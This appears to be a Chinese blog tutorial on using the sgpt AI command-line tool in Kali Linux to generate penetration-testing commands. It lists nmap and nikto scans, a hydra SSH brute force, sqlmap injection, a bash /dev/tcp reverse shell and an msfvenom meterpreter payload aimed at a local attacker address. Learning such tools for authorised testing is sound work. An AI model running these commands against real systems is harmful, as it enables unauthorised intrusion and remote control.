sgpt在kali应用

发布于:2025-05-01 ⋅ 阅读:(54) ⋅ 点赞:(0)

Kali Linux 下 sgpt 渗透测试相关案例

1. 扫描目标主机存活

sgpt -s "使用 nmap 扫描 192.168.1.100 是否存活"

示例命令:

nmap -sn 192.168.1.100

2. 扫描目标主机开放端口和服务

sgpt -s "使用 nmap 扫描 192.168.1.100 常见端口和服务"

示例命令:

nmap -sV -p 1-1000 192.168.1.100

3. 使用 nikto 扫描 Web 服务器漏洞

sgpt -s "使用 nikto 扫描 http://192.168.1.100 的漏洞"

示例命令:

nikto -h http://192.168.1.100

4. 利用 hydra 进行 SSH 爆破(用户名:root,密码字典:/usr/share/wordlists/rockyou.txt)

sgpt -s "用 hydra 对 192.168.1.100 的 ssh 端口进行爆破,用户名 root"

示例命令:

hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100

5. 使用 sqlmap 对目标 URL 进行注入测试

sgpt -s "使用 sqlmap 对 http://192.168.1.100/vuln.php?id=1 进行 SQL 注入测试"

示例命令:

sqlmap -u "http://192.168.1.100/vuln.php?id=1" --batch

6. 反向连接到攻击机的 shell (假设攻击机 IP 为 192.168.1.50,端口 4444)

sgpt -s "生成一个 bash 反向 shell 脚本,连接到 192.168.1.50 的 4444 端口"

示例命令:

bash -i >& /dev/tcp/192.168.1.50/4444 0>&1

7. 使用 netcat 监听本地端口等待连接

sgpt -s "使用 nc 监听本地 4444 端口,等待反向 shell 连接"

示例命令:

nc -lvnp 4444

8. 查找具有 SUID 权限的文件,寻找提权机会

sgpt -s "查找系统中所有具有 SUID 权限的文件"

示例命令:

find / -perm -4000 -type f 2>/dev/null

9. 使用 curl 上传文件到目标服务器

sgpt -s "用 curl 命令上传 attack.sh 文件到 http://192.168.1.100/upload"

示例命令:

curl -F "file=@attack.sh" http://192.168.1.100/upload

10. 利用 msfconsole 生成 payload

sgpt -s "用 msfvenom 生成 windows/meterpreter/reverse_tcp 负载,连接回 192.168.1.50 端口 4444"

示例命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

总结

  • 利用 sgpt 只需输入自然语言描述,即可快速生成渗透测试中常用命令,大大提升效率。
  • 以上案例适合 Kali Linux 上的日常渗透测试流程。
  • 建议结合 sgpt 输出命令自行审核,确保合规和安全。


网站公告

今日签到

点亮在社区的每一天
去签到